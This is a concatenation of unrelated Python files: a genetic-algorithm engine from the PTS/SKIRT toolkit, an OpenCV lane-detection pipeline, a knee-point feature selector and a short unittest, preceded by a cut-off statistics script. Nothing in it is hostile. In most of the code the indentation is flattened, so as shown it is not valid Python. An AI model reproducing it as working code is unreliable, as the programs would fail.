print ("{}\t{}\t{}\t{}".format(int(self.chrNum) + 1, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window])))
if __name__ == '__main__':
open_file = OpenFile(args.file, "file", 1)
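# Example invocation (hypothetical script and file names):
#   python partitionStats.py -file stats.txt.gz -ind ind1,ind2 -avg yes -out het -win 10000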
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.evolve.simplega This module contains the GA Engine; the GA Engine class is responsible
# for the whole evolutionary process. It contains the GA Engine related
# functions, like the termination criteria functions for convergence analysis, etc.
#
# Default Parameters:
#*Number of Generations*
# Default is 100 generations
#*Mutation Rate*
# Default is 0.02, which represents 2%
#*Crossover Rate*
# Default is 0.9, which represents 90%
#*Elitism Replacement*
# Default is 1 individual
#*Population Size*
# Default is 80 individuals
#*Minimax*
# >>> constants.minimaxType["maximize"]
# Maximize the evaluation function
#*DB Adapter*
# Default is **None**
#*Migration Adapter*
# Default is **None**
#*Interactive Mode*
# Default is **True**
#*Selector (Selection Method)*
# :func:`Selectors.GRankSelector`
# The Rank Selection method
#
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import division, print_function
# Import standard modules
import numpy as np
from time import time
from types import BooleanType
from sys import stdout as sys_stdout
# Import other evolve modules
from population import GPopulation
from functionslot import FunctionSlot
from genome import GenomeBase
from dbadapters import DBBaseAdapter
import constants
import utils
# Import the relevant PTS classes and modules
from ..core.tools.logging import log
from ..core.tools import serialization
from ..core.tools.random import prng
# -----------------------------------------------------------------
def RawScoreCriteria(ga_engine):
"""
Terminate the evolution using the **bestrawscore** and **rounddecimal**
    parameters obtained from the individual
Example:
>>> genome.setParams(bestrawscore=0.00, rounddecimal=2)
(...)
>>> ga_engine.terminationCriteria.set(GSimpleGA.RawScoreCriteria)
"""
ind = ga_engine.bestIndividual()
bestRawScore = ind.getParam("bestrawscore")
roundDecimal = ind.getParam("rounddecimal")
if bestRawScore is None:
utils.raiseException("you must specify the bestrawscore parameter", ValueError)
if ga_engine.getMinimax() == constants.minimaxType["maximize"]:
if roundDecimal is not None:
return round(bestRawScore, roundDecimal) <= round(ind.score, roundDecimal)
else:
return bestRawScore <= ind.score
else:
if roundDecimal is not None:
return round(bestRawScore, roundDecimal) >= round(ind.score, roundDecimal)
else:
return bestRawScore >= ind.score
# -----------------------------------------------------------------
def ConvergenceCriteria(ga_engine):
"""
    Terminate the evolution when the population has converged
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
"""
pop = ga_engine.get_population()
return pop[0] == pop[len(pop) - 1]
# -----------------------------------------------------------------
def RawStatsCriteria(ga_engine):
""" Terminate the evolution based on the raw stats
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.RawStatsCriteria)
"""
stats = ga_engine.getStatistics()
if stats["rawMax"] == stats["rawMin"]:
if stats["rawAve"] == stats["rawMax"]:
return True
return False
# -----------------------------------------------------------------
def FitnessStatsCriteria(ga_engine):
""" Terminate the evoltion based on the fitness stats
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.FitnessStatsCriteria)
"""
stats = ga_engine.getStatistics()
if stats["fitMax"] == stats["fitMin"]:
if stats["fitAve"] == stats["fitMax"]:
return True
return False
# -----------------------------------------------------------------
class GAEngine(object):
"""
This class represents the Genetic Algorithm Engine
Example:
>>> ga = GAEngine(genome)
>>> ga.selector.set(Selectors.GRouletteWheel)
>>> ga.setGenerations(120)
>>> ga.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
:param genome: the :term:`Sample Genome`
:param interactiveMode: this flag enables the Interactive Mode, the default is True
    .. note:: if you use the same random seed, all runs of the algorithm will be the same
"""
selector = None
""" This is the function slot for the selection method
if you want to change the default selector, you must do this: ::
ga_engine.selector.set(Selectors.GRouletteWheel) """
stepCallback = None
""" This is the :term:`step callback function` slot,
if you want to set the function, you must do this: ::
def your_func(ga_engine):
# Here you have access to the GA Engine
return False
ga_engine.stepCallback.set(your_func)
now *"your_func"* will be called every generation.
When this function returns True, the GA Engine will stop the evolution and show
a warning, if False, the evolution continues.
"""
terminationCriteria = None
""" This is the termination criteria slot, if you want to set one
termination criteria, you must do this: ::
ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
Now, when you run your GA, it will stop when the population converges.
There are those termination criteria functions: :func:`GSimpleGA.RawScoreCriteria`,
:func:`GSimpleGA.ConvergenceCriteria`, :func:`GSimpleGA.RawStatsCriteria`, :func:`GSimpleGA.FitnessStatsCriteria`
But you can create your own termination function, this function receives
one parameter which is the GA Engine, follows an example: ::
def ConvergenceCriteria(ga_engine):
pop = ga_engine.get_population()
return pop[0] == pop[len(pop)-1]
When this function returns True, the GA Engine will stop the evolution and show
a warning, if False, the evolution continues, this function is called every
generation.
"""
def __init__(self, genome, interactiveMode=True):
""" Initializator of GSimpleGA """
#if seed is not None: random.seed(seed) # used to be like this
if type(interactiveMode) != BooleanType:
utils.raiseException("Interactive Mode option must be True or False", TypeError)
if not isinstance(genome, GenomeBase):
utils.raiseException("The genome must be a GenomeBase subclass", TypeError)
self.internalPop = GPopulation(genome)
self.nGenerations = constants.CDefGAGenerations
self.pMutation = constants.CDefGAMutationRate
self.pCrossover = constants.CDefGACrossoverRate
self.nElitismReplacement = constants.CDefGAElitismReplacement
self.setPopulationSize(constants.CDefGAPopulationSize)
self.minimax = constants.minimaxType["maximize"]
self.elitism = True
# NEW
self.new_population = None
# Adapters
self.dbAdapter = None
self.migrationAdapter = None
self.time_init = None
self.max_time = None
self.interactiveMode = interactiveMode
self.interactiveGen = -1
self.GPMode = False
self.selector = FunctionSlot("Selector")
self.stepCallback = FunctionSlot("Generation Step Callback")
self.terminationCriteria = FunctionSlot("Termination Criteria")
self.selector.set(constants.CDefGASelector)
self.allSlots = (self.selector, self.stepCallback, self.terminationCriteria)
self.internalParams = {}
self.currentGeneration = 0
# GP Testing
for classes in constants.CDefGPGenomes:
if isinstance(self.internalPop.oneSelfGenome, classes):
self.setGPMode(True)
break
log.debug("A GA Engine was created, nGenerations=%d", self.nGenerations)
# New
self.path = None
# -----------------------------------------------------------------
@classmethod
def from_file(cls, path):
"""
This function ...
:param path:
:return:
"""
# Inform the user
log.info("Loading the genetic algorithm engine from '" + path + "' ...")
# Load the GA object from file
ga = serialization.load(path)
# Set the path of the GA file
ga.path = path
# Return the GA
return ga
# -----------------------------------------------------------------
def save(self):
"""
This function ...
:return:
"""
# Save to the current path
self.saveto(self.path)
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
# Inform the user
log.info("Saving the genetic algorithm engine to '" + path + "' ...")
# Set the new path as the current path and save
self.path = path
serialization.dump(self, path, protocol=2)
# -----------------------------------------------------------------
def setGPMode(self, bool_value):
"""
Sets the Genetic Programming mode of the GA Engine
:param bool_value: True or False
"""
self.GPMode = bool_value
# -----------------------------------------------------------------
def getGPMode(self):
""" Get the Genetic Programming mode of the GA Engine
:rtype: True or False
"""
return self.GPMode
# -----------------------------------------------------------------
def __call__(self, *args, **kwargs):
""" A method to implement a callable object
Example:
>>> ga_engine(freq_stats=10)
.. versionadded:: 0.6
The callable method.
"""
if kwargs.get("freq_stats", None):
return self.evolve(kwargs.get("freq_stats"))
else: return self.evolve()
# -----------------------------------------------------------------
def setParams(self, **args):
""" Set the internal params
Example:
>>> ga.setParams(gp_terminals=['x', 'y'])
:param args: params to save
        .. versionadded:: 0.6
Added the *setParams* method.
"""
self.internalParams.update(args)
# -----------------------------------------------------------------
def getParam(self, key, nvl=None):
""" Gets an internal parameter
Example:
>>> ga.getParam("gp_terminals")
['x', 'y']
:param key: the key of param
:param nvl: if the key doesn't exist, the nvl will be returned
        .. versionadded:: 0.6
Added the *getParam* method.
"""
return self.internalParams.get(key, nvl)
# -----------------------------------------------------------------
def setInteractiveGeneration(self, generation):
""" Sets the generation in which the GA must enter in the
Interactive Mode
:param generation: the generation number, use "-1" to disable
        .. versionadded:: 0.6
The *setInteractiveGeneration* method.
"""
if generation < -1:
utils.raiseException("Generation must be >= -1", ValueError)
self.interactiveGen = generation
# -----------------------------------------------------------------
def getInteractiveGeneration(self):
""" returns the generation in which the GA must enter in the
Interactive Mode
:rtype: the generation number or -1 if not set
        .. versionadded:: 0.6
The *getInteractiveGeneration* method.
"""
return self.interactiveGen
# -----------------------------------------------------------------
def setElitismReplacement(self, numreplace):
""" Set the number of best individuals to copy to the next generation on the elitism
:param numreplace: the number of individuals
.. versionadded:: 0.6
The *setElitismReplacement* method.
"""
if numreplace < 1:
utils.raiseException("Replacement number must be >= 1", ValueError)
self.nElitismReplacement = numreplace
# -----------------------------------------------------------------
def setInteractiveMode(self, flag=True):
""" Enable/disable the interactive mode
:param flag: True or False
        .. versionadded:: 0.6
The *setInteractiveMode* method.
"""
if type(flag) != BooleanType:
utils.raiseException("Interactive Mode option must be True or False", TypeError)
self.interactiveMode = flag
# -----------------------------------------------------------------
def __repr__(self):
""" The string representation of the GA Engine """
minimax_type = constants.minimaxType.keys()[constants.minimaxType.values().index(self.minimax)]
ret = "- GSimpleGA\n"
ret += "\tGP Mode:\t\t %s\n" % self.getGPMode()
ret += "\tPopulation Size:\t %d\n" % self.internalPop.popSize
ret += "\tGenerations:\t\t %d\n" % self.nGenerations
ret += "\tCurrent Generation:\t %d\n" % self.currentGeneration
ret += "\tMutation Rate:\t\t %.2f\n" % self.pMutation
ret += "\tCrossover Rate:\t\t %.2f\n" % self.pCrossover
ret += "\tMinimax Type:\t\t %s\n" % minimax_type.capitalize()
ret += "\tElitism:\t\t %s\n" % self.elitism
ret += "\tElitism Replacement:\t %d\n" % self.nElitismReplacement
ret += "\tDB Adapter:\t\t %s\n" % self.dbAdapter
for slot in self.allSlots:
ret += "\t" + slot.__repr__()
ret += "\n"
# Return the string
return ret
# -----------------------------------------------------------------
def setMultiProcessing(self, flag=True, full_copy=False, max_processes=None):
""" Sets the flag to enable/disable the use of python multiprocessing module.
Use this option when you have more than one core on your CPU and when your
evaluation function is very slow.
        Pyevolve will automatically check if your Python version has **multiprocessing**
        support and if you have more than one CPU core. If you don't have support
        or have only one core, Pyevolve will not use the **multiprocessing**
        feature.
Pyevolve uses the **multiprocessing** to execute the evaluation function over
the individuals, so the use of this feature will make sense if you have a
        truly slow evaluation function (which is common in GAs).
The parameter "full_copy" defines where the individual data should be copied back
after the evaluation or not. This parameter is useful when you change the
individual in the evaluation function.
:param flag: True (default) or False
:param full_copy: True or False (default)
:param max_processes: None (default) or an integer value
        .. warning:: Use this option only when your evaluation function is slow, so that
           you get a good tradeoff between the process communication overhead and the
           parallel evaluation. Using **multiprocessing** doesn't always mean
           better performance.
        .. note:: To enable the multiprocessing option, you **MUST** add the *__main__* check
           to your application, otherwise it will result in errors. See more on the
           `Python Docs <http://docs.python.org/library/multiprocessing.html#multiprocessing-programming>`__
           site.
.. versionadded:: 0.6
The `setMultiProcessing` method.
"""
if type(flag) != BooleanType:
utils.raiseException("Multiprocessing option must be True or False", TypeError)
if type(full_copy) != BooleanType:
utils.raiseException("Multiprocessing 'full_copy' option must be True or False", TypeError)
self.internalPop.setMultiProcessing(flag, full_copy, max_processes)
# -----------------------------------------------------------------
def setMigrationAdapter(self, migration_adapter=None):
"""
Sets the Migration Adapter
.. versionadded:: 0.6
The `setMigrationAdapter` method.
"""
self.migrationAdapter = migration_adapter
if self.migrationAdapter is not None:
self.migrationAdapter.setGAEngine(self)
# -----------------------------------------------------------------
def setDBAdapter(self, dbadapter=None):
"""
Sets the DB Adapter of the GA Engine
:param dbadapter: one of the :mod:`DBAdapters` classes instance
        .. warning:: the use of a DB Adapter can reduce the performance of the
           Genetic Algorithm.
"""
if (dbadapter is not None) and (not isinstance(dbadapter, DBBaseAdapter)):
utils.raiseException("The DB Adapter must be a DBBaseAdapter subclass", TypeError)
self.dbAdapter = dbadapter
# -----------------------------------------------------------------
def setPopulationSize(self, size):
"""
Sets the population size, calls setPopulationSize() of GPopulation
:param size: the population size
.. note:: the population size must be >= 2
"""
if size < 2:
utils.raiseException("population size must be >= 2", ValueError)
self.internalPop.setPopulationSize(size)
# -----------------------------------------------------------------
def setSortType(self, sort_type):
"""
Sets the sort type, constants.sortType["raw"]/constants.sortType["scaled"]
Example:
>>> ga_engine.setSortType(constants.sortType["scaled"])
:param sort_type: the Sort Type
"""
if sort_type not in constants.sortType.values():
utils.raiseException("sort type must be a constants.sortType type", TypeError)
self.internalPop.sortType = sort_type
# -----------------------------------------------------------------
def setMutationRate(self, rate):
"""
Sets the mutation rate, between 0.0 and 1.0
:param rate: the rate, between 0.0 and 1.0
"""
if (rate > 1.0) or (rate < 0.0):
utils.raiseException("Mutation rate must be >= 0.0 and <= 1.0", ValueError)
self.pMutation = rate
# -----------------------------------------------------------------
def setCrossoverRate(self, rate):
"""
Sets the crossover rate, between 0.0 and 1.0
:param rate: the rate, between 0.0 and 1.0
"""
if (rate > 1.0) or (rate < 0.0):
utils.raiseException("Crossover rate must be >= 0.0 and <= 1.0", ValueError)
self.pCrossover = rate
# -----------------------------------------------------------------
def setGenerations(self, num_gens):
"""
Sets the number of generations to evolve
:param num_gens: the number of generations
"""
if num_gens < 1:
utils.raiseException("Number of generations must be >= 1", ValueError)
self.nGenerations = num_gens
# -----------------------------------------------------------------
def getGenerations(self):
"""
Return the number of generations to evolve
:rtype: the number of generations
.. versionadded:: 0.6
Added the *getGenerations* method
"""
return self.nGenerations
# -----------------------------------------------------------------
def getMinimax(self):
""" Gets the minimize/maximize mode
:rtype: the constants.minimaxType type
"""
return self.minimax
# -----------------------------------------------------------------
def setMinimax(self, mtype):
""" Sets the minimize/maximize mode, use constants.minimaxType
:param mtype: the minimax mode, from constants.minimaxType
"""
if mtype not in constants.minimaxType.values():
utils.raiseException("Minimax must be maximize or minimize", TypeError)
self.minimax = mtype
# -----------------------------------------------------------------
def getCurrentGeneration(self):
""" Gets the current generation
:rtype: the current generation
"""
return self.currentGeneration
# -----------------------------------------------------------------
def setElitism(self, flag):
""" Sets the elitism option, True or False
:param flag: True or False
"""
if type(flag) != BooleanType:
utils.raiseException("Elitism option must be True or False", TypeError)
self.elitism = flag
# -----------------------------------------------------------------
def getDBAdapter(self):
""" Gets the DB Adapter of the GA Engine
        :rtype: an instance of one of the :mod:`DBAdapters` classes
"""
return self.dbAdapter
# -----------------------------------------------------------------
def setMaxTime(self, seconds):
""" Sets the maximun evolve time of the GA Engine
:param seconds: maximum time in seconds
"""
self.max_time = seconds
# -----------------------------------------------------------------
def getMaxTime(self):
""" Get the maximun evolve time of the GA Engine
:rtype: True or False
"""
return self.max_time
# -----------------------------------------------------------------
def bestIndividual(self):
""" Returns the population best individual
:rtype: the best individual
"""
return self.internalPop.bestRaw()
# -----------------------------------------------------------------
def worstIndividual(self):
""" Returns the population worst individual
        :rtype: the worst individual
"""
return self.internalPop.worstRaw()
# -----------------------------------------------------------------
def __gp_catch_functions(self, prefix):
""" Internally used to catch functions with some specific prefix
as non-terminals of the GP core """
import __main__ as mod_main
function_set = {}
main_dict = mod_main.__dict__
for obj, addr in main_dict.items():
if obj[0:len(prefix)] == prefix:
try:
op_len = addr.func_code.co_argcount
                except AttributeError:
continue
function_set[obj] = op_len
if len(function_set) <= 0:
utils.raiseException("No function set found using function prefix '%s' !" % prefix, ValueError)
self.setParams(gp_function_set=function_set)
# -----------------------------------------------------------------
def initialize(self):
"""
This function initializes the GA Engine. Create and initialize the first population
"""
# Inform the user
log.info("Initializing the GA engine ...")
# Keep track of the time passed
self.time_init = time()
# Create the first population
self.internalPop.create(minimax=self.minimax)
# Initialize the population (initializes all individuals of the population)
self.internalPop.initialize(ga_engine=self)
# -----------------------------------------------------------------
def set_scores(self, scores, check=None):
"""
        Sets the scores of the individuals of the current generation and advances
        the generation counter.
        :param scores: the score values, one per individual
        :param check: optional mapping of expected parameter values, used to verify the individual ordering
        :return:
"""
# Set the scores for the initial population
if self.is_initial_generation: self.set_scores_for_population(self.internalPop, scores, check)
# Set the scores for the new population
else:
# Set scores
self.set_scores_for_population(self.new_population, scores, check)
# Replace
if self.new_population is not None: self.replace_internal_population()
# Increment the current generation number
self.currentGeneration += 1
# Sort the internal population
self.internalPop.sort()
# Set new pop to None
self.new_population = None
# -----------------------------------------------------------------
def set_scores_for_population(self, population, scores, check=None):
"""
        Sets the scores of the individuals of the given population.
        :param population: the population whose individuals receive the scores
        :param scores: the score values, one per individual
        :param check: optional mapping of expected parameter values, used to verify the individual ordering
        :return:
"""
index = 0
for individual in population:
if check is not None:
                # Get the parameter values for this individual
parameter_a = individual.genomeList[0]
parameter_b = individual.genomeList[1]
parameter_a_check = check["Parameter a"][index]
parameter_b_check = check["Parameter b"][index]
rel_diff_a = abs((parameter_a - parameter_a_check) / parameter_a)
rel_diff_b = abs((parameter_b - parameter_b_check) / parameter_b)
assert np.isclose(parameter_a, parameter_a_check, rtol=1e-11), rel_diff_a
assert np.isclose(parameter_b, parameter_b_check, rtol=1e-11), rel_diff_b
# Set the score
individual.score = scores[index]
# Increment the index
index += 1
# -----------------------------------------------------------------
def get_population(self):
""" Return the internal population of GA Engine
:rtype: the population (:class:`GPopulation.GPopulation`)
"""
return self.internalPop
# -----------------------------------------------------------------
def getStatistics(self):
"""
Gets the Statistics class instance of current generation
:rtype: the statistics instance (:class:`Statistics.Statistics`)
"""
return self.internalPop.getStatistics()
# -----------------------------------------------------------------
def generate_new_population(self):
"""
        Generates the new population from the current internal population using
        selection, crossover and mutation, and stores it in 'new_population'.
        :return:
"""
# Inform the user
log.info("Creating generation " + str(self.currentGeneration) + " ...")
# Clone the current internal population
newPop = GPopulation(self.internalPop)
log.debug("Population was cloned.")
size_iterate = len(self.internalPop)
# Odd population size
if size_iterate % 2 != 0:
size_iterate -= 1
crossover_empty = self.select(popID=self.currentGeneration).crossover.isEmpty()
for i in xrange(0, size_iterate, 2):
genomeMom = self.select(popID=self.currentGeneration)
genomeDad = self.select(popID=self.currentGeneration)
if not crossover_empty and self.pCrossover >= 1.0:
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2):
(sister, brother) = it
else:
if not crossover_empty and utils.randomFlipCoin(self.pCrossover):
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2):
(sister, brother) = it
else:
sister = genomeMom.clone()
brother = genomeDad.clone()
sister.mutate(pmut=self.pMutation, ga_engine=self)
brother.mutate(pmut=self.pMutation, ga_engine=self)
newPop.internalPop.append(sister)
newPop.internalPop.append(brother)
if len(self.internalPop) % 2 != 0:
genomeMom = self.select(popID=self.currentGeneration)
genomeDad = self.select(popID=self.currentGeneration)
if utils.randomFlipCoin(self.pCrossover):
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=1):
(sister, brother) = it
else:
sister = prng.choice([genomeMom, genomeDad])
sister = sister.clone()
sister.mutate(pmut=self.pMutation, ga_engine=self)
newPop.internalPop.append(sister)
        # Store the new population
self.new_population = newPop
# -----------------------------------------------------------------
def step(self):
"""
This function performs one step in the evolution, i.e. one generation
"""
# Inform the user
log.info("Performing step in the evolutionary process ...")
# Generate the new population ## NEW
self.generate_new_population()
# Evaluate
print(self.generation_description)
self.new_population.evaluate()
# Replace population
self.replace_internal_population()
# Sort the population
self.internalPop.sort()
# Set new population to None
self.new_population = None
# Inform the user
#log.success("The generation %d was finished.", self.currentGeneration)
# Increment the current generation number
self.currentGeneration += 1
if self.max_time:
total_time = time() - self.time_init
if total_time > self.max_time:
return True
return self.currentGeneration == self.nGenerations
# -----------------------------------------------------------------
def replace_internal_population(self):
"""
        Replaces the internal population with the new population, applying
        elitism first if it is enabled.
        :return:
"""
# Elitism:
if self.elitism: self.do_elitism(self.new_population)
# Set the new population as the internal population and sort it
self.internalPop = self.new_population
# -----------------------------------------------------------------
def do_elitism(self, new_population):
"""
        Applies elitism: copies the best individuals of the current population
        into the new population.
        :param new_population: the population that receives the elite individuals
        :return:
"""
        # Elitism has slightly different meanings across metaheuristics, and for GAs in particular. In general,
        # elitism is related to memory: "remember the best solution found" (a kind of greediness). In the most
        # traditional form, for evolutionary algorithms (GA, EA, DE...), elitism means the best solution found
        # is used to build the next generation. For GAs in particular, it means keeping the best individual
        # found intact for the next generation. For multiobjective optimization there is even a proof
        # (Villalobos, Coello and Hernandez, 2005) linking convergence and elitism.
#
# Elitism involves copying a small proportion of the fittest candidates, unchanged, into the next generation.
# This can sometimes have a dramatic impact on performance by ensuring that the EA does not waste time
# re-discovering previously discarded partial solutions. Candidate solutions that are preserved unchanged
# through elitism remain eligible for selection as parents when breeding the remainder of the next generation.
log.debug("Doing elitism ...")
if self.getMinimax() == constants.minimaxType["maximize"]:
for i in xrange(self.nElitismReplacement):
##re-evaluate before being sure this is the best
# self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ?
if self.internalPop.bestRaw(i).score > new_population.bestRaw(i).score:
new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i)
elif self.getMinimax() == constants.minimaxType["minimize"]:
for i in xrange(self.nElitismReplacement):
##re-evaluate before being sure this is the best
# self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ?
if self.internalPop.bestRaw(i).score < new_population.bestRaw(i).score:
new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i)
# -----------------------------------------------------------------
def printStats(self):
""" Print generation statistics
:rtype: the printed statistics as string
.. versionchanged:: 0.6
The return of *printStats* method.
"""
percent = self.currentGeneration * 100 / float(self.nGenerations)
message = "Gen. %d (%.2f%%):" % (self.currentGeneration, percent)
log.info(message)
print(message,)
sys_stdout.flush()
self.internalPop.statistics()
stat_ret = self.internalPop.printStats()
return message + stat_ret
# -----------------------------------------------------------------
def printTimeElapsed(self):
"""
Shows the time elapsed since the begin of evolution
"""
total_time = time() - self.time_init
print("Total time elapsed: %.3f seconds." % total_time)
return total_time
# -----------------------------------------------------------------
def dumpStatsDB(self):
"""
Dumps the current statistics to database adapter
"""
log.debug("Dumping stats to the DB Adapter")
self.internalPop.statistics()
self.dbAdapter.insert(self)
# -----------------------------------------------------------------
def evolve(self, freq_stats=0):
""" Do all the generations until the termination criteria, accepts
the freq_stats (default is 0) to dump statistics at n-generation
Example:
>>> ga_engine.evolve(freq_stats=10)
(...)
:param freq_stats: if greater than 0, the statistics will be
printed every freq_stats generation.
:rtype: returns the best individual of the evolution
.. versionadded:: 0.6
the return of the best individual
"""
# Initialize
self.initialize_evolution()
# Do the evolution loop
self.evolve_loop(freq_stats)
# Finish evolution, return best individual
return self.finish_evolution()
# -----------------------------------------------------------------
@property
def is_initial_generation(self):
"""
        Whether the engine is still at the initial generation, i.e. no new population has been generated yet.
:return:
"""
if self.new_population is None:
            if self.currentGeneration > 0: raise RuntimeError("Inconsistent state: 'new_population' is None but 'currentGeneration' > 0")
return True
else: return False
# -----------------------------------------------------------------
@property
def generation_description(self):
"""
        A human-readable description of the current generation.
:return:
"""
if self.is_initial_generation: return "Initial generation"
else: return "Generation " + str(self.currentGeneration)
# -----------------------------------------------------------------
def initialize_evolution(self):
"""
        Initializes the evolution: creates, evaluates and sorts the initial population.
:return:
"""
self.initialize()
# Inform the user ...
log.info("Evaluating and sorting the initial population ...")
# Evaluate and sort the internal population
self.internalPop.evaluate()
self.sort_internal_population()
# -----------------------------------------------------------------
def sort_internal_population(self):
"""
        Sorts the internal population.
:return:
"""
self.internalPop.sort()
# -----------------------------------------------------------------
def evolve_loop(self, freq_stats):
"""
        Runs the evolution loop, evolving one generation at a time until a stopping condition is met.
        :param freq_stats: if greater than 0, the statistics will be printed every freq_stats generation
        :return:
"""
log.debug("Starting loop over evolutionary algorithm.")
while True:
if not self.evolve_generation(freq_stats): break
# -----------------------------------------------------------------
def finish_evolution(self, silent=True):
"""
        Finishes the evolution: optionally prints the final statistics, flushes pending
        statistics to the DB adapter, stops the migration adapter and returns the best individual.
        :param silent: if False, print the final statistics and the elapsed time
        :return:
"""
if not silent:
self.printStats()
self.printTimeElapsed()
if self.dbAdapter:
log.debug("Closing the DB Adapter")
if not (self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0):
self.dumpStatsDB()
self.dbAdapter.commitAndClose()
if self.migrationAdapter:
log.debug("Closing the Migration Adapter")
self.migrationAdapter.stop()
return self.bestIndividual()
# -----------------------------------------------------------------
def evolve_generation(self, freq_stats):
"""
        Evolves a single generation: handles migration exchange, step callbacks,
        termination criteria, statistics printing and DB dumping.
        :param freq_stats: if greater than 0, the statistics will be printed every freq_stats generation
        :return: True if the evolution should continue, False if it should stop
"""
stopFlagCallback = False
stopFlagTerminationCriteria = False
if self.migrationAdapter:
log.debug("Migration adapter: exchange")
self.migrationAdapter.exchange()
self.internalPop.clearFlags()
self.internalPop.sort()
if not self.stepCallback.isEmpty():
for it in self.stepCallback.applyFunctions(self):
stopFlagCallback = it
if not self.terminationCriteria.isEmpty():
for it in self.terminationCriteria.applyFunctions(self):
stopFlagTerminationCriteria = it
if freq_stats:
if (self.currentGeneration % freq_stats == 0) or (self.getCurrentGeneration() == 0):
self.printStats()
if self.dbAdapter:
if self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0:
self.dumpStatsDB()
if stopFlagTerminationCriteria:
log.debug("Evolution stopped by the Termination Criteria !")
if freq_stats:
print("\n\tEvolution stopped by Termination Criteria function !\n")
return False
if stopFlagCallback:
log.debug("Evolution stopped by Step Callback function !")
if freq_stats:
print("\n\tEvolution stopped by Step Callback function !\n")
return False
if self.step(): return False
return True
# -----------------------------------------------------------------
def select(self, **args):
"""
Select one individual from population
        :param args: these parameters will be sent to the selector
"""
for it in self.selector.applyFunctions(self.internalPop, **args):
return it
# -----------------------------------------------------------------
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
image = mpimg.imread('bridge_shadow.jpg')
# Edit this function to create your own pipeline.
def pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):
img = np.copy(img)
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Grayscale image
# NOTE: we already saw that standard grayscaling lost color information for the lane lines
    # Explore gradients in other color spaces / color channels to see what might work better
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Sobel x
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
    # Threshold x gradient (use the sx_thresh parameter instead of hard-coded values)
    sxbinary = np.zeros_like(scaled_sobel)
    sxbinary[(scaled_sobel >= sx_thresh[0]) & (scaled_sobel <= sx_thresh[1])] = 1
    # Threshold color channel (use the s_thresh parameter instead of hard-coded values)
    s_binary = np.zeros_like(s_channel)
    s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return combined_binary
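# A usage sketch with non-default thresholds (the values below are illustrative
# assumptions, not tuned settings):
# result = pipeline(image, s_thresh=(150, 255), sx_thresh=(30, 120))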
result = pipeline(image)
# Plot the result
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))
f.tight_layout()
ax1.imshow(image)
ax1.set_title('Original Image', fontsize=40)
ax2.imshow(result)
ax2.set_title('Pipeline Result', fontsize=40)
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
|
from typing import NamedTuple
import numpy as np
from kneed import KneeLocator
FeaturesSelection = NamedTuple(
"FeaturesSelection",
[
("score", np.ndarray),
("index", np.ndarray),
("selection", np.ndarray),
("threshold", float),
],
)
def _gradient(values: np.ndarray, order: int = 1) -> np.ndarray:
result = values
for _ in range(order):
result = np.gradient(result)
return result
def _plateau_point(sorted_scores: np.ndarray) -> int:
gradient = np.abs(_gradient(sorted_scores))
is_plateau = gradient <= np.percentile(gradient, 1)
plateau_points = np.nonzero(is_plateau)[0]
return int(np.median(plateau_points))
def _knee_point(decreasing_segment: np.ndarray) -> int:
locator = KneeLocator(
x=np.arange(decreasing_segment.size, dtype=int),
y=decreasing_segment,
S=1.0,
curve="convex",
direction="decreasing",
)
assert locator.knee is not None
    return int(locator.knee)
def select_features(feature_scores: np.ndarray) -> FeaturesSelection:
feature_scores = feature_scores.ravel()
index = np.argsort(-feature_scores)
score = feature_scores[index]
plateau_point = _plateau_point(score)
concave_up_segment = score[:plateau_point]
knee_location = _knee_point(concave_up_segment)
threshold = score[knee_location]
selection = feature_scores >= threshold
return FeaturesSelection(score, index, selection, threshold)
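# A minimal usage sketch (the synthetic exponential scores below are an
# illustrative assumption, not part of the original module):
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    demo_scores = rng.exponential(scale=1.0, size=200)
    result = select_features(demo_scores)
    print(f"threshold={result.threshold:.4f}, kept {int(result.selection.sum())} of {demo_scores.size} features")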
|
import unittest
import numpy as np
import pandas as pd
from disarm_gears.frames import Timeframe
# Inputs
start_date = '2000-06-15'
end_date = '2010-06-20'
class TimeframeTests(unittest.TestCase):
def test_inputs(self):
# Check bad inputs
self.assertRaises(AssertionError, Timeframe, start=start_date, length=0)
self.assertRaises(AssertionError, Timeframe, start=start_date, length=3, step=.5)
